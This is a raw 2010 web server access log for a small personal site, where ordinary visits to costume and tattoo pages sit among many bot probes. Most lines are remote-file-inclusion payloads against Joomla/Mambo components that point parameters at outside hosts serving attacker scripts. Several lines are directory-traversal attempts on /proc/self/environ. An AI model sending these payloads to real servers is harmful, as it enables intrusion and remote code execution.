204.15.190.163 - - [28/Apr/2010:07:15:57 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:57 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:59 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:59 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:10 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:10 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:10 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:17 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:17 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:17 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:41 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:41 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:41 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:49 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:50 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:16:50 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:18:00 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:07:20:19 -0500] "GET //bbs//skin/zina02_green/write.php?dir=http://planetwork-team.do.am/v6.txt%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
189.108.172.26 - - [28/Apr/2010:07:20:19 -0500] "GET /logs//bbs//skin/zina02_green/write.php?dir=http://planetwork-team.do.am/v6.txt%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
72.52.150.147 - - [28/Apr/2010:07:22:22 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:07:22:22 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:07:22:22 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
163.24.136.10 - - [28/Apr/2010:07:23:47 -0500] "GET /logs/access_log.1217548800//index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
163.24.136.10 - - [28/Apr/2010:07:23:48 -0500] "GET //index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
163.24.136.10 - - [28/Apr/2010:07:23:48 -0500] "GET /logs//index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.52.150.147 - - [28/Apr/2010:07:23:56 -0500] "GET /logs/access_log.1263254400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
204.15.190.163 - - [28/Apr/2010:07:26:02 -0500] "GET //include/write.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:26:03 -0500] "GET /logs//include/write.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:26:03 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.228.161.3 - - [28/Apr/2010:07:27:48 -0500] "GET /logs/access_log.1270598400//index.php?sayfa=http://www.rostopt.ru///ad4f9f6db6ba0d26b52da46647bd39a6-julia/roxx.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.828"
67.228.161.3 - - [28/Apr/2010:07:27:48 -0500] "GET //index.php?sayfa=http://www.rostopt.ru///ad4f9f6db6ba0d26b52da46647bd39a6-julia/roxx.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.828"
67.228.161.3 - - [28/Apr/2010:07:27:48 -0500] "GET /logs//index.php?sayfa=http://www.rostopt.ru///ad4f9f6db6ba0d26b52da46647bd39a6-julia/roxx.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.828"
213.251.189.204 - - [28/Apr/2010:07:35:32 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://healthshop.mhcasia.com//administrator/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:35:32 -0500] "GET /logs/access_log.1264464000//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://healthshop.mhcasia.com//administrator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:35:35 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://healthshop.mhcasia.com//administrator/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:35:38 -0500] "GET /logs/access_log.1264550400//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://healthshop.mhcasia.com//administrator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
163.24.136.10 - - [28/Apr/2010:07:35:50 -0500] "GET /logs/access_log.1217548800//index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
163.24.136.10 - - [28/Apr/2010:07:35:51 -0500] "GET //index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
163.24.136.10 - - [28/Apr/2010:07:35:52 -0500] "GET /logs//index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.251.189.204 - - [28/Apr/2010:07:36:32 -0500] "GET /logs/access_log.1270684800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:36:32 -0500] "GET /logs/access_log.1219363200%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:36:32 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:36:32 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:37:11 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:37:11 -0500] "GET /logs/access_log.1219363200//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:37:11 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:37:25 -0500] "GET /logs/access_log.1270684800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.182 - - [28/Apr/2010:07:41:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.122.36.34 - - [28/Apr/2010:07:42:11 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:07:42:11 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:07:42:11 -0500] "GET /logs/access_log.1264723200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:07:43:13 -0500] "GET /logs/access_log.1189987200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.112.25.222 - - [28/Apr/2010:07:44:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.112.25.222 - - [28/Apr/2010:07:44:47 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.112.25.222 - - [28/Apr/2010:07:45:09 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.112.25.222 - - [28/Apr/2010:07:45:10 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.112.25.222 - - [28/Apr/2010:07:45:10 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.112.25.222 - - [28/Apr/2010:07:45:13 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.46.204.228 - - [28/Apr/2010:07:45:24 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.112.25.222 - - [28/Apr/2010:07:45:38 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.55.146.200 - - [28/Apr/2010:07:51:32 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:51:32 -0500] "GET /logs/access_log.1213488000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:51:32 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.251.189.204 - - [28/Apr/2010:07:52:16 -0500] "GET /logs/access_log.1265760000//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:16 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:17 -0500] "GET /logs/access_log.1266364800//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:19 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:19 -0500] "GET /logs/access_log.1265760000//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:19 -0500] "GET /logs/access_log.1264291200//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:19 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:52:19 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.204.185 - - [28/Apr/2010:07:52:25 -0500] "GET /logs/access_log.1252108800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.190.166.35 - - [28/Apr/2010:07:53:16 -0500] "GET /logs/access_log.1213488000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:07:53:16 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:07:53:16 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
174.142.75.205 - - [28/Apr/2010:07:53:22 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
174.142.75.205 - - [28/Apr/2010:07:53:22 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
174.142.75.205 - - [28/Apr/2010:07:53:22 -0500] "GET /logs/access_log.1224115200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
84.38.160.77 - - [28/Apr/2010:07:57:45 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:57:45 -0500] "GET /logs/access_log.1213488000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:57:45 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
91.142.208.158 - - [28/Apr/2010:07:59:20 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.142.208.158 - - [28/Apr/2010:07:59:20 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.142.208.158 - - [28/Apr/2010:07:59:20 -0500] "GET /logs/access_log.1224115200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:00:25 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:00:25 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:00:25 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?hl=en&client=firefox-a&hs=BR7&rls=org.mozilla%3Aen-US%3Aofficial&q=retro+tattoo+flash+sheets&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:29 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
69.242.84.197 - - [28/Apr/2010:08:01:36 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7"
212.241.177.123 - - [28/Apr/2010:08:02:04 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:28 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:28 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:37 -0500] "GET /logs/access_log.1268956800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:49 -0500] "GET /logs/access_log.1268956800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:49 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [28/Apr/2010:08:02:49 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:04:13 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:04:13 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:04:13 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.177.123 - - [28/Apr/2010:08:04:13 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
